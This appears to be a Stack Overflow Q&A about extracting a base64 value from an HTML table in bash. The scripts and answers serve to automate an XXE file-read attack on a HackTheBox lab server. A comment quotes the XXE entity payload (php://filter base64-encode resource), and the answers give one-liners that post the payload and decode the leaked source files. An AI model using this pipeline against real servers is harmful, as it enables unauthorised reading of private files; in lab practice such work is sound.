# How can I remove HTML from a string in bash?

Tags: html, bash, sed

I am trying to remove the `<td>` and `</td>` from a curl output. The output gives a table view that looks like this:

```
If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>
```

Under the `CWE:` column is some base64 I want to decode. Here is what I have tried:

```
#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "
```

Only, I keep getting

```
sed: -e expression #1, char 9: unknown option to `s'
```

on the `cat file` line.

Update: Using `xmllint`

```
#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')
```

Gives me this:

```
warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"
```

Update more:

```
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -
```

> XPath set is empty

Comment: Do you have a compelling reason not to use HTML-aware tools for this? Python ships with several lxml libraries, and modern Linux distros include `xmllint` and similar tools that can be run from the command line. See f/e [xmllint to parse a html file](https://stackoverflow.com/questions/42680061/xmllint-to-parse-a-html-file)

Comment: `xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file)` isn't working @CharlesDuffy

Comment: `$(cat file)`? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken.

Comment: [Don't Parse XML/HTML With Regex.](https://stackoverflow.com/a/1732454/3776858) I suggest to use an XML/HTML parser (xmlstarlet, xmllint ...).

Comment: while we've got some sample input: `If DB were ready ... </table>`, we don't have the matching expected output; please update the question with the expected output

Comment: So the "failed to load external entity" errors are completely normal when you do the silly `$(cat file)` thing and put each word from your HTML file into a different command line argument to xmllint.

Comment: That is the input and the expected output is the `SSBBTSBTT01FIEJBU0U2NAo=` base64 @markp-fuso

Comment: Correct usage would be more like `xmllint --html --xpath '/table/tbody/tr[2]/td[2]' - <file`. Or, y'know, just skip the file altogether and pipe `curl ... | xmllint --html --xpath '/table/tbody/tr[2]/td[2]' -`.

Comment: Oh ya, I wrapped it in quotes `"$(cat file|sed '1,1d')"` and now I just get one warning @CharlesDuffy

Comment: Stop using `cat`. Nobody ever told you to use cat -- I didn't, the linked duplicate didn't, I don't know how you got the idea in your head.

Comment: Piping it to xmllint doesn't work, comes up with the help page lol @CharlesDuffy

Comment: so explicitly state that in the question, eg: `expected output is:` `SSBBTSBTT01FIEJBU0U2NAo=`

Comment: If the purpose of the cat call is to remove the first line, you can still do that. `curl ... | sed '1,1d' | xmllint ...`

Comment: "Under the CWE: column is some base64 I want to decode." wasn't clear enough? my bad @markp-fuso

Comment: @Jaquarh, **show us** how you did the pipeline. If you left out the `-`, that would cause an error. Don't make me trust that you did something right and still get an error, **show me** that you're doing it right and still get the error.

Comment: `curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --html --xpath /table/tbody/tr[2]/td[2]` @CharlesDuffy

Comment: @Jaquarh, that's exactly the thing I told you not to do, leaving out the `-`

Comment: ahhh I see, now I get `XPath set is empty` =D @CharlesDuffy

Comment: Great, so now you just need to tune your xpath expression until it's a match for your input document. This is a much narrower/easier problem. :)

Comment: First, your question's HTML doesn't have a `tbody`, so why are you putting a `tbody` in your xpath expression? **Web browsers** reformat bad HTML into good HTML, so they'll add elements like that, but you aren't using a web browser here.

Comment: Oh ya... im confused why I did that too.... let me try correct this, not really good with xpaths @CharlesDuffy

Comment: Ahh, I can't figure it out I tried `/table/tr[2]/td[2]` but `XPath set is empty`  and yeah, I can't use a web browser because the `staging.txt` holds an XXE I'm trying to automate. I can manually `base64 -d` this but large files take time, to scroll through so I wanted to automate it so I can read source files via the XXE @CharlesDuffy

Comment: Are you showing us the *whole* HTML file or just a subset?

Comment: I ask because `/table/...` assumes that the file starts with `<table>` at the top level; if it puts it inside `<html><body><table>...</table></body></html>`, then you need your XPath to be `/html/body/table` instead.

Comment: Or, of course, you can use `//table` to an unrooted search.

Answer (score 1, accepted):

Addressing the (original) issue of the `sed` error:

- `sed 's/</td>//g`
- using `/` as a delimiter but `/` is also part of the string to be replaced
- net result: `sed` sees an extra `/` which is a syntax issue
- either switch to another delimiter that doesn't show up in the data (eg, `|`) or escape the data (eg, `<\/td>`)

---

As for the bigger picture (parsing out the `CWE:` value) ...

Assuming an HTML-aware tool is not available, there's only one `CWE:` in the input, and the input is nicely formatted as shown, replace the `cat/grep/sed/sed/sed/sed/tr` mess and let `awk` do the work, eg:

```
awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file
```

This generates:

```
SSBBTSBTT01FIEJBU0U2NAo=
```

Comment: Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich.

Comment: Thankyou!! My XXE uses `php://` filter to generate base64 encoded source files from the server: `<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]>` so I can now automatically just scrape the source code! I appreciate it!

Comment: @CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-)

Comment: its a hackthebox lab, not real world. I just like to automate my tools for the writeups @markp-fuso

Comment: @Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though.

Comment: What is wrong with that, a lot of people have jobs as pentesters @CharlesDuffy

Comment: @Jaquarh, if you're a competent pentester, you should have a good sense of the extent to which sloppy implementations of parsers and protocols lead to vulnerabilities. If you're so focused on the red-team side of the job that you don't see the skills learnt there as better informing how the blue team should operate... well, I don't know what I can say.

Comment: @Jaquarh, so when I say "you can use in the real world", that should be read to mean things you can use _safely_, without inviting means by which your code can be induced to behave incorrectly.

Answer (score 1):

For extracting data from html files (supposing it is well formed XML), you better try this one liner:

```sh
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' | base64 -d
```

Answer (score 1):

Please don't use RegEx to parse HTML, but use an HTML parser like [xidel](/questions/tagged/xidel) instead.

The final bit, extracting and decoding the base64 string:

```
$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64
```

Despite not knowing the content of your *'xxe.txt'*, `xidel` can probably also do all those steps for you:

```
$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'
```

or

```
$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
```